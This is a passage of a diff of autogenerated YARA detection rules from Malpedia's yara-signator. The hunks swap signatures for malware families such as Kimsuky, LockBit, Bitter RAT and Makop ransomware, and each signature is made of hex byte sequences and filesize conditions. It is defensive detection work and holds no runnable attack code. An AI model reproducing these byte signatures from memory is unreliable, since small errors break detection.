8b4db8 81e1dbb036e4 33c8 334db8 8b55b8 83c201 8955b8 } + $sequence_1 = { 0b55d0 8b45d0 83e801 8945d0 85d2 741e 8b4dd0 } + $sequence_2 = { 898584feffff e9???????? 8b8d9cfeffff 83e901 898d9cfeffff 8b959cfeffff 8b859cfeffff } + $sequence_3 = { b901000000 85c9 741d 8b955ceaffff c1e206 81ca2bb0d5ca 03955ceaffff } + $sequence_4 = { 0b8dcce9ffff 898dcce9ffff e9???????? 8b95cce9ffff 69d237b0cb41 33c0 81fa237558e2 } + $sequence_5 = { 7353 8bc1 c1f805 8bf1 8d3c85004d4400 8b07 83e61f } + $sequence_6 = { 7e3e b8913b77ee 2b8508fdffff 398508fdffff 7c17 8b8d08fdffff c1e105 } + $sequence_7 = { 0f94c1 81c9efb286ac 7412 8b956cfcffff 039560fcffff 89956cfcffff c785acfcffffeed81864 } + $sequence_8 = { 894dec eb12 8b55f8 2b55ec 8955f8 8b45ec 83c001 } + $sequence_9 = { c1e009 05335b8425 2385e4e9ffff 0b85ece9ffff 8985ece9ffff 8b8de4e9ffff } condition: - 7 of them and filesize <8224768 + 7 of them and filesize <573440 } -rule MALPEDIA_Win_Kimsuky_Auto : FILE +rule MALPEDIA_Win_Gcman_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "161d56f8-b6bc-5eb6-924b-1d343e294025" + id = "c3dd4f52-d013-5409-b72e-5ec2ecf28c4b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kimsuky_auto.yar#L1-L285" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gcman_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "9e58434bf421de4759f7d578f12345202af7c8ac65503745224655e4e4de3bf9" + logic_hash = "646fd6c677e3b810f35c02ba75646dde96abf31f60dd053593e8964313629ea3" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -144488,53 +147366,32 @@ rule MALPEDIA_Win_Kimsuky_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ffd6 8bd8 85db 7510 5e } - $sequence_1 = { 6a00 6800f70484 6a00 6a00 68???????? 8d85e4fbffff 50 } - $sequence_2 = { 8d85ecfbffff 50 8d85f8feffff 50 8d85f4fdffff } - $sequence_3 = { ffd7 a3???????? 8d85ccf3ffff 50 56 ffd7 } - $sequence_4 = { 7503 56 eb18 6a00 6a00 6a00 } - $sequence_5 = { 85c0 7423 6a00 8d85f0feffff 50 68???????? } - $sequence_6 = { b9???????? e8???????? 8d85f8feffff 50 6a00 6a00 6a1a } - $sequence_7 = { eb06 ff15???????? 85c0 7421 } - $sequence_8 = { ff15???????? 85c0 7516 ff15???????? 8bd8 e8???????? } - $sequence_9 = { 4156 4157 4883ec40 48896c2470 4889742438 4533ff 4c89642428 } - $sequence_10 = { ebdb 65488b042560000000 48897c2430 48896c2460 } - $sequence_11 = { 0f857affffff 4c8b7c2460 4c8b6c2420 4c8b642428 488b7c2430 488b742438 488b6c2470 } - $sequence_12 = { 498bce 418d5001 ffd3 488bc3 4883c440 415f } - $sequence_13 = { 488b742438 488b6c2470 4d8bc6 4d2b4730 } - $sequence_14 = { 0f8540feffff 488b6c2460 4c637d3c 33c9 41b800300000 4c03fd } - $sequence_15 = { 4533ff 4c89642428 4c896c2420 33f6 4533ed 4533e4 } - $sequence_16 = { 85c0 0f94c1 85c9 0f8494020000 } - $sequence_17 = { 4c89642430 c744242880000000 c744242002000000 4533c9 4533c0 } - $sequence_18 = { 85c0 0f8432020000 8b7590 660f1f440000 } - $sequence_19 = { 8b9590000000 0395d8000000 0395b8000000 8bbda0010000 8d4702 03c2 89442450 } - $sequence_20 = { 8b4c2468 c6043900 803f00 740d } - $sequence_21 = { 488d8a38000000 e9???????? 488d8a28010000 e9???????? } - $sequence_22 = { 85c0 7464 c7453038000000 33c0 } - $sequence_23 = { 85c0 7471 895c2468 8d4801 } - $sequence_24 = { 83f809 8d7340 7405 be20000000 c68424a000000000 } - $sequence_25 = { 668945c4 8b05???????? 8945d8 0fb705???????? } - $sequence_26 = { 668945ea 6644896dec 4c8d45c0 488d1563c20400 } - $sequence_27 = { 66894507 884509 895d0b 85ff } - $sequence_28 = { 668945dc 448d62ff e8???????? 33db } - $sequence_29 = { 668945b0 488d4db0 e8???????? 488d442450 } - $sequence_30 = { 668945e8 488bc3 7203 488b03 } + $sequence_0 = { a1???????? 8944240c c7442408???????? 8b85d0ebffff } + $sequence_1 = { 0375e0 01f1 81e959dc6b54 c1c10f 01d9 89c6 } + $sequence_2 = { 89442408 c7442404???????? 8d8528eaffff 890424 e8???????? } + $sequence_3 = { 8944240c c7442408???????? 89542404 8b45f4 890424 } + $sequence_4 = { c705????????00000000 c705????????00000000 e8???????? 85c0 7439 8d859ceaffff 89442410 } + $sequence_5 = { c745c400000000 e9???????? c744241c00000000 c744241800000000 c744241403000000 c744241000000000 } + $sequence_6 = { 83bdd4ebffff00 750c c7042401000000 e8???????? } + $sequence_7 = { 8b8558efffff 890424 e8???????? 83ec08 81bde8efffff03010000 7405 } + $sequence_8 = { 89c6 31d6 31ce 0375d8 01f3 81eb1b662419 c1c30b } + $sequence_9 = { 40 890424 e8???????? 8945fc 8b45fc 89442408 8b450c } condition: - 7 of them and filesize <1021952 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Friedex_Auto : FILE +rule MALPEDIA_Win_Dispenserxfs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "97d1751f-5738-5834-8f82-479344539d3a" + id = "49bf9fde-27a7-5a52-b363-6d4c360f5198" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.friedex_auto.yar#L1-L172" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dispenserxfs_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "8dffa1fb6804412157c235a0ef3196dc0c5961e846d30c21c59180ff32555e60" + logic_hash = "0ae97d732c7fee9f1fd4b6377f2a916fed962748494ab51169af7ce6e36e4229" score = 75 quality = 75 tags = "FILE" @@ -144548,40 +147405,34 @@ rule MALPEDIA_Win_Friedex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 57 8bc8 e8???????? 6a26 } - $sequence_1 = { c20c00 51 51 53 55 8be9 c744240820090d0a } - $sequence_2 = { 1adb e8???????? 6a20 5f } - $sequence_3 = { 74f9 33c9 663908 0f94c0 5f 5e 5d } - $sequence_4 = { 663910 7431 8bd8 8d7102 eb1d } - $sequence_5 = { 5f 5b 5e 5d c20c00 51 } - $sequence_6 = { 75c1 6a2a 5f eb06 b001 eb0f 03c5 } - $sequence_7 = { 6a00 ff760c ffd0 8b442408 5e } - $sequence_8 = { 8955e0 e8???????? 8d0dd830a500 890424 894c2404 e8???????? } - $sequence_9 = { 8d055a23a500 31c9 8d55d8 803d????????e9 8955d4 8945d0 } - $sequence_10 = { 8a2c057530a500 83c001 38e9 8945a0 8955cc 74bc } - $sequence_11 = { 8d055a23a500 5d c3 55 } - $sequence_12 = { c7424458270000 c7424800100100 8b7de4 c787cc00000000000000 c787c800000000000000 } - $sequence_13 = { 8b45a4 8a4daf 31d2 8a2c057530a500 83c001 38e9 } - $sequence_14 = { 8d0dc930a500 890424 894c2404 e8???????? 8d0d4430a500 31d2 8b75f8 } - $sequence_15 = { 8d0d4430a500 31d2 890c24 c744240400000000 } + $sequence_0 = { 8975c0 8975c4 8b35???????? 57 c745b430000000 c745b803000000 } + $sequence_1 = { 68???????? e8???????? c7042410270000 ff15???????? 6a00 } + $sequence_2 = { 6a02 ff15???????? 8bf0 83feff 74ef 8d85d4fdffff c785d4fdffff2c020000 } + $sequence_3 = { 7c08 8d50ec e8???????? 57 ff15???????? } + $sequence_4 = { 7451 33c9 33c0 8bd9 663b422e 731f 8b4230 } + $sequence_5 = { 50 ffd6 53 6a03 58 50 8d8555ffffff } + $sequence_6 = { 898de0feffff 89b5e4feffff 89b5e8feffff 89b5ecfeffff 89b5f0feffff 66899df6feffff } + $sequence_7 = { 8945f0 0f823cffffff 8b4df4 8b45e4 } + $sequence_8 = { 8bcf e8???????? 8d8548feffff 8bd3 50 8bcf } + $sequence_9 = { 8d55c4 83c414 8bf2 8a02 42 } condition: - 7 of them and filesize <204800 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Yty_Auto : FILE +rule MALPEDIA_Win_Lockbit_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "02d4730a-30ed-52fc-baae-eabe1247d262" + id = "945a5bdc-50cc-5372-b470-aafc3e12d474" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yty_auto.yar#L1-L501" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lockbit_auto.yar#L1-L203" license_url = "N/A" - logic_hash = "379d5918b4988ca6f478472e8b6e04b973c7dd65b7661d4073d168551cfe004f" + logic_hash = "ef292234a38c5f85ea42d6220d555a65163be7c7bef94693195ea2cefdb10cc0" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -144593,77 +147444,42 @@ rule MALPEDIA_Win_Yty_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f840c000000 8365d8fe 8b7508 e9???????? } - $sequence_1 = { 8d45f4 64a300000000 8b7508 33ff 897dd8 } - $sequence_2 = { 8975e0 85c9 7407 8b11 8b4204 ffd0 c745fc00000000 } - $sequence_3 = { 668910 8bc6 5b 8be5 5d c20400 } - $sequence_4 = { ffd2 8b8568ffffff 8b08 8b5108 50 } - $sequence_5 = { eb69 8a1402 2ad1 8bfe 80ea13 } - $sequence_6 = { 6a00 8d4508 c746140f000000 c7461000000000 } - $sequence_7 = { 750c 680e000780 e8???????? 33ff c745fcffffffff } - $sequence_8 = { 80ea04 b904000000 eb23 8b5508 397d1c 7303 } - $sequence_9 = { 85c0 52 0f95c3 ffd6 } - $sequence_10 = { 2ad1 8bfe 80ea04 b901000000 e9???????? } - $sequence_11 = { 40 3b4610 0f82dbfeffff 397d1c } - $sequence_12 = { 83c40c 8d8de8fdffff 51 53 53 } - $sequence_13 = { 8b4e10 397e14 7211 8a1402 8b3e } - $sequence_14 = { 894608 8945fc 56 c745f001000000 } - $sequence_15 = { 8bcf e8???????? 8b0e 8b5104 8b443238 } - $sequence_16 = { 53 50 e8???????? 83c40c 8d8de8fdffff } - $sequence_17 = { 7303 8d5508 8b4e10 397e14 7214 } - $sequence_18 = { 8bfe 8a1402 2ad1 80ea13 33c9 881407 } - $sequence_19 = { 8b4c3138 33db 895de8 885def 8975e0 } - $sequence_20 = { 807def00 8b5de8 7503 83cb02 8b16 8b4a04 } - $sequence_21 = { c0ea02 8ac4 80e20f c0e004 } - $sequence_22 = { 8b07 eb02 8bc7 8b4de0 } - $sequence_23 = { 8b4c1938 895dd4 85c9 7405 8b01 ff5004 c745fc00000000 } - $sequence_24 = { 8b85c4f5ffff 50 e8???????? 83c404 8d95c0f5ffff 33c9 52 } - $sequence_25 = { 8bcc 8975f4 50 e8???????? ff7510 8d4dd4 } - $sequence_26 = { 762a 8b4d08 8b5108 8a8210a04600 2c01 8845ff 8b4d08 } - $sequence_27 = { 68???????? ff15???????? 3bf4 e8???????? 8bf4 8b4594 50 } - $sequence_28 = { b9???????? e8???????? 51 8d8d90bcf0ff } - $sequence_29 = { 6bf630 8b0c8d60cb4300 80643128fd 5f } - $sequence_30 = { 8bec 8b4508 8bc8 83e01f c1f905 8b0c8da0244300 } - $sequence_31 = { 83e61f 8d3c8da0244300 8b0f c1e606 833c0eff 7535 833d????????01 } - $sequence_32 = { c745e401000000 e9???????? c745e000000000 8b15???????? a1???????? 01d0 } - $sequence_33 = { ff15???????? 85c0 0f85e3020000 68???????? 50 50 ff15???????? } - $sequence_34 = { 8b4804 8d4190 89840df0b8f0ff 8d8d04b9f0ff e8???????? 8b85f4b8f0ff 8b4004 } - $sequence_35 = { 0f851f040000 8d853cfeffff 83c01c 890424 } - $sequence_36 = { 8b4d0c 83e13f 6bd130 8b048500b04600 } - $sequence_37 = { 3bf4 e8???????? 8bf4 8b8574fcffff 50 ff15???????? 3bf4 } - $sequence_38 = { 01ca 0fb612 89d1 8b550c 01ca 8810 } - $sequence_39 = { 740c c785d4ddffffac084500 eb0a c785d4ddffffd4d44400 8b85a4ddffff 50 } - $sequence_40 = { 8b4508 890424 e8???????? 8945d8 837dd800 0f847a050000 } - $sequence_41 = { e8???????? c78562feffff00000000 8d8566feffff b960000000 bb00000000 } - $sequence_42 = { 8d8da8efffff e8???????? 50 8d8dd0efffff e8???????? 8d8da8efffff e9???????? } - $sequence_43 = { e8???????? 83ec0c 8d8ddcfbffff 0f1000 0f1105???????? f30f7e4010 } - $sequence_44 = { f3ab c745f800000000 c745d400000000 8b450c } - $sequence_45 = { e8???????? c78324020000ffffffff c78328020000ffffffff 83c414 5b } - $sequence_46 = { 56 53 83ec14 8b5c2420 e8???????? 85db c70000000000 } - $sequence_47 = { e9???????? 8975e4 33c0 39b880f94200 } - $sequence_48 = { 750c c785bcddffff60084500 eb0a c785bcddffffd4d44400 b802000000 } - $sequence_49 = { 83e63f c1ff06 6bf630 8b04bd60cb4300 f644302880 741f e8???????? } - $sequence_50 = { 8d15f0224100 e8???????? 58 5a } - $sequence_51 = { 83e826 89c2 a1???????? c744240800000000 89542404 890424 e8???????? } - $sequence_52 = { 0f87b1030000 ff24bd41574200 8b41e4 3b42e4 7478 0fb642e4 0fb671e4 } - $sequence_53 = { 57 897de8 ff15???????? 8bd0 8955ec c645fc01 c746140f000000 } - $sequence_54 = { c745dc03000000 eb7c c745e088044300 ebbb d9e8 } + $sequence_0 = { 0f28c8 660f73f904 660fefc8 0f28c1 660f73f804 } + $sequence_1 = { 50 e8???????? 8d858cfeffff 50 8d45c0 50 8d45a0 } + $sequence_2 = { fec1 47 4e 85f6 75d2 5d } + $sequence_3 = { 56 57 8d9d84fcffff b900c2eb0b e2fe e8???????? 53 } + $sequence_4 = { 6683f866 7706 6683e857 eb17 6683f830 720c 6683f839 } + $sequence_5 = { 33db 55 8b6d10 8bc1 } + $sequence_6 = { 8d8550fdffff 50 6a00 ff15???????? } + $sequence_7 = { 33c0 8d7df0 33c9 53 0fa2 } + $sequence_8 = { f745f800000002 740c 5f 5e } + $sequence_9 = { 02d3 8a5c1500 8a541d00 8a541500 fec2 8a441500 } + $sequence_10 = { 33d0 8bc1 c1e810 0fb6c0 c1e208 } + $sequence_11 = { 53 56 57 33c0 8b5d14 33c9 33d2 } + $sequence_12 = { 8d45f8 50 8d45fc 50 ff75fc ff75f4 } + $sequence_13 = { e9???????? 6683f841 720c 6683f846 7706 6683e837 } + $sequence_14 = { 6a00 6a00 6800000040 ff75d4 } + $sequence_15 = { 5b 8907 897704 894f08 89570c f745f800000002 740c } + $sequence_16 = { 214493fc 8b5df8 8bc3 43 } + $sequence_17 = { 7407 8bce e8???????? 837b0402 } + $sequence_18 = { 7414 663901 740f 0f1f440000 } + $sequence_19 = { 1bdb 83e30b 83c328 ff7518 8b7d08 8d049500000000 ff7514 } condition: - 7 of them and filesize <1097728 + 7 of them and filesize <2049024 } -rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE +rule MALPEDIA_Win_Scarabey_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "37962373-db6b-5a82-a667-796eaa294f65" + id = "32f7c136-d07c-5221-8524-163d31e0f9ce" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lazarus_killdisk_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scarabey_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "f14584aa2cdb4f56b5df407c3c19c0436c1677938983b3e7a6f77f9ce3d89a22" + logic_hash = "1ba8f19bbb29b54a80b4850f75f9b4dbbfff504fea1a8a75cc950df78ae9916b" score = 75 quality = 75 tags = "FILE" @@ -144676,33 +147492,33 @@ rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" - strings: - $sequence_0 = { 8b530c 8b4308 33c9 8d4402ff 0fa4c109 } - $sequence_1 = { e8???????? 83c40c 57 8d4c242c } - $sequence_2 = { 8bf0 83feff 740e 8bce e8???????? 56 } - $sequence_3 = { 6a00 6800000002 ffd3 8bf0 83feff 7409 6a00 } - $sequence_4 = { 7438 8d55f0 52 68???????? } - $sequence_5 = { 89842430020000 53 56 57 e8???????? 8b1d???????? 33ff } - $sequence_6 = { 68???????? 57 ff15???????? 8b45a2 8b4da6 8b55ae } - $sequence_7 = { 8d95c0fdffff c1e009 52 50 57 } - $sequence_8 = { 40 83c610 8985e4fdffff 83f804 } - $sequence_9 = { 8d5de8 8955ec 894df4 8945f0 e8???????? 807db600 } - + strings: + $sequence_0 = { 8bf0 85f6 7478 8b8dfcd6ffff 8b95f4d6ffff 8d85fcd6ffff 50 } + $sequence_1 = { e8???????? c745fcffffffff 8b06 8b7e04 2bf8 85c0 7409 } + $sequence_2 = { 51 52 ffd3 6a40 6800300000 } + $sequence_3 = { ff15???????? 56 ff15???????? a1???????? 33f6 56 } + $sequence_4 = { ba12000000 8d0dd0ad5700 e9???????? db2d???????? d9c9 d9f5 9b } + $sequence_5 = { 7d04 8944241c 686666aa00 50 33db 6a02 895c2450 } + $sequence_6 = { 8bc8 8b8524d7ffff 83c005 8d14c500000000 2bd0 a1???????? 03ca } + $sequence_7 = { e8???????? 8b4d08 8b83d40c0000 8bf0 83f907 7771 ff248d690c4700 } + $sequence_8 = { eb4c 8d4c2404 68???????? 51 e8???????? 83c408 84c0 } + $sequence_9 = { c744240808000000 c744240cff000000 ff15???????? 8bce e8???????? 6a00 e8???????? } + condition: - 7 of them and filesize <209920 + 7 of them and filesize <3580928 } -rule MALPEDIA_Win_Balkan_Door_Auto : FILE +rule MALPEDIA_Win_Bart_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9f746f91-5631-5121-b4e8-99ba1997828d" + id = "1691d219-2287-5770-a9af-369cb19fd25c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.balkan_door_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bart_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "3ecc62d6dd03e7104a1dd179870266fc7dbfc3c0ad204dec134adb374e60ab02" + logic_hash = "20a38c1c6b8b98b8d85839077c1f03f4679fb05ea3fd09bb3acf392b4f9ee60a" score = 75 quality = 75 tags = "FILE" @@ -144716,32 +147532,32 @@ rule MALPEDIA_Win_Balkan_Door_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff15???????? 8bf8 89bd3cefffff } - $sequence_1 = { 8bf0 85f6 740b 6a00 6a00 56 ff15???????? } - $sequence_2 = { ffd7 85c0 741a 8d85d0fdffff c785d0fdffff2c020000 50 56 } - $sequence_3 = { 8d85f4fdffff 50 ffd7 85c0 741a 8d85d0fdffff c785d0fdffff2c020000 } - $sequence_4 = { c785d0fdffff2c020000 50 56 ffd3 } - $sequence_5 = { 56 ff15???????? 8b4dfc 8b85ccfdffff 33cd 5e e8???????? } - $sequence_6 = { e8???????? 83c404 8bbd3cefffff 6a00 } - $sequence_7 = { 8b85d8fdffff 8985ccfdffff 5f 5b 56 } - $sequence_8 = { 683f000f00 68???????? 57 ff15???????? } - $sequence_9 = { 50 57 6a00 6a13 ffb53cefffff ff15???????? 85c0 } + $sequence_0 = { 8b0483 3bd0 772e 7205 80c1ff 79e8 33c9 } + $sequence_1 = { 8b0433 03c2 03c1 3bc2 7404 1bc9 } + $sequence_2 = { 8a18 894dd0 8955c8 8945cc 57 85f6 } + $sequence_3 = { 660fd6459c e8???????? 83c410 8d8570ffffff 33c9 ba07000000 } + $sequence_4 = { e8???????? 8b7598 8d4d9c 8b5590 0fb606 } + $sequence_5 = { 8b4485dc d3e8 88043a 0fbed3 3bd6 7cde 8bbd58ffffff } + $sequence_6 = { 7868 8bc8 0fbec2 8b5508 894c2418 8d1482 8a44240e } + $sequence_7 = { 84db 0f8ed3020000 0fb6d3 8bc7 899564ffffff 0b08 8d4004 } + $sequence_8 = { 8bca e8???????? 8b4dfc 83c438 33cd 5f 5e } + $sequence_9 = { 0f88ff000000 8b7df4 83c706 42 } condition: - 7 of them and filesize <352256 + 7 of them and filesize <163840 } -rule MALPEDIA_Win_Unidentified_110_Auto : FILE +rule MALPEDIA_Win_Kingminer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "264cfac8-ace3-5d01-a52d-48fde572696d" + id = "13b82737-eb1a-51ab-9795-8340f262e7e5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_110_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kingminer_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "d08f798b1cfbec1be54b7df96bb36676a27b486448d2260bb80e971ad4c99ec2" + logic_hash = "f79d58fb6043de2ccd7faac7ea9ed3b2513556edb2a1cd9df8f496a155aebade" score = 75 quality = 75 tags = "FILE" @@ -144755,32 +147571,32 @@ rule MALPEDIA_Win_Unidentified_110_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff5638 4839d8 756f 488b37 ba08000000 4889f9 e8???????? } - $sequence_1 = { 7809 488d1542850a00 59 c3 b907000000 cd29 0f0b } - $sequence_2 = { 8b842440010000 898424f0000000 0f28842420010000 0f288c2430010000 0f298c24e0000000 0f298424d0000000 8b8424c8000000 } - $sequence_3 = { 884710 4883670800 c6471100 488d542428 48891a 4c8d052abf0e00 eb3e } - $sequence_4 = { 488d95100a0000 48c70208000000 488d8d70120000 e8???????? e9???????? 4c8bb568130000 6a0c } - $sequence_5 = { 488d8c24f0010000 e8???????? 41bf01000000 e9???????? 488dac2460010000 488b4530 4889842400010000 } - $sequence_6 = { 4c89fa 4989c0 e8???????? 488b8698000000 4801d8 483b8690000000 7763 } - $sequence_7 = { 89ca b101 e9???????? b103 e9???????? 4c8b01 410fb64810 } - $sequence_8 = { ffe1 31c9 4883bc241801000004 0f84f8620000 488b942448030000 488b32 4883fe02 } - $sequence_9 = { eb02 31c0 4883c428 c3 4c8d0df4bf0900 4889c1 4c89c2 } + $sequence_0 = { a1???????? 885c30fe a1???????? 0fb64c30f9 884c30fc } + $sequence_1 = { ff15???????? 6a01 ff15???????? 6a00 ff15???????? 8b4508 } + $sequence_2 = { 83c40c 807c30ff62 8d4c30ff 0f8599010000 } + $sequence_3 = { ff15???????? 6a00 ff15???????? 8b80c0000000 85c0 7422 } + $sequence_4 = { 6a00 ff15???????? 6a00 ff15???????? 6a01 ff15???????? 6a00 } + $sequence_5 = { 3bf0 741e 68c1000000 ff15???????? 5b } + $sequence_6 = { ff15???????? a1???????? 50 ffd7 ff15???????? 6a01 ff15???????? } + $sequence_7 = { 6a04 6800100000 51 52 ffd0 83c414 85c0 } + $sequence_8 = { 8d4dec 51 8d580c 56 8bc7 c745ec89480489 } + $sequence_9 = { 8b95d0feffff 2b4234 7419 83b9a000000000 7466 50 } condition: - 7 of them and filesize <3217408 + 7 of them and filesize <165888 } -rule MALPEDIA_Win_Bitter_Rat_Auto : FILE +rule MALPEDIA_Win_Khrat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "48708c16-f954-55fa-bcb7-85a1e067df06" + id = "cae82139-c683-5bf8-8807-a11668477f96" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bitter_rat_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.khrat_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "cf289391c2e8c84704b0f60fd200159e5bca809a29a5213fda197ca45567e744" + logic_hash = "074673c423b5c49f07577630b1f328510bc324887f41ca6e4261bb8bfff0e2f0" score = 75 quality = 75 tags = "FILE" @@ -144794,71 +147610,71 @@ rule MALPEDIA_Win_Bitter_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf4 6830750000 ff15???????? 3bf4 e8???????? e9???????? } - $sequence_1 = { e8???????? 8d856cf8ffff 50 8b8da8feffff 51 e8???????? } - $sequence_2 = { ff15???????? 3bf4 e8???????? 898574d8ffff 8bf4 8d858cd8ffff } - $sequence_3 = { 83c408 8d85fcd8ffff 50 e8???????? 83c404 898558d9ffff 8b8558d9ffff } - $sequence_4 = { ff15???????? 3bf4 e8???????? 8945a0 8bf4 6a01 } - $sequence_5 = { eb12 8b45f4 83e801 8945f4 8b4de8 83c101 894de8 } - $sequence_6 = { 89859cdbffff 8b8d9cdbffff 81e9d3070000 898d9cdbffff 83bd9cdbffff15 0f872b020000 8b959cdbffff } - $sequence_7 = { 8d1c8d00124700 8bf0 83e61f c1e606 8b0b 0fbe4c3104 83e101 } - $sequence_8 = { e8???????? 83c404 85c0 7420 e8???????? 8bf4 68d0070000 } - $sequence_9 = { 3b05???????? 0f8688000000 a1???????? d1e0 3945f8 760b 8b4df8 } + $sequence_0 = { 8d858cfbffff 50 68f4030000 57 } + $sequence_1 = { 66c745e00000 8b859cfbffff 8945e8 8b8590fbffff 8945ec 8945f0 } + $sequence_2 = { c9 c20400 55 8bec 81c4d0f9ffff } + $sequence_3 = { 81c448feffff c705????????ffffffff 8d8572feffff 50 6802020000 e8???????? 6a06 } + $sequence_4 = { 68???????? 6a00 e8???????? 0bc0 0f840e010000 } + $sequence_5 = { 66c746326500 66c746347700 66c746363a00 66c746380000 8db500feffff } + $sequence_6 = { ff35???????? 8f45e6 8d45e2 50 e8???????? c9 } + $sequence_7 = { eb25 ff35???????? e8???????? 8d85d4fdffff } + $sequence_8 = { c9 c3 55 8bec 83c4fc 833d????????ff } + $sequence_9 = { 50 8d85bcf8ffff 50 8d85dcf8ffff 50 8d8500ffffff } condition: - 7 of them and filesize <1130496 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Bandook_Auto : FILE +rule MALPEDIA_Win_Makop_Ransomware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "facf6ec8-b33d-5307-a31b-1f1e19226ca5" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bandook_auto.yar#L1-L133" + id = "cd34e745-9497-5ffc-bd73-ecb5996e2067" + date = "2023-07-11" + modified = "2023-07-15" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makop_ransomware_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "d695c77bc8945b310c81d69b92952d60e6bda737f194777e74e4b6ebb23f8272" + logic_hash = "3c7cc3419f322a8e9eb8473ecaf54fc5da0725e8a0f35ff3f90245e28389848b" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = 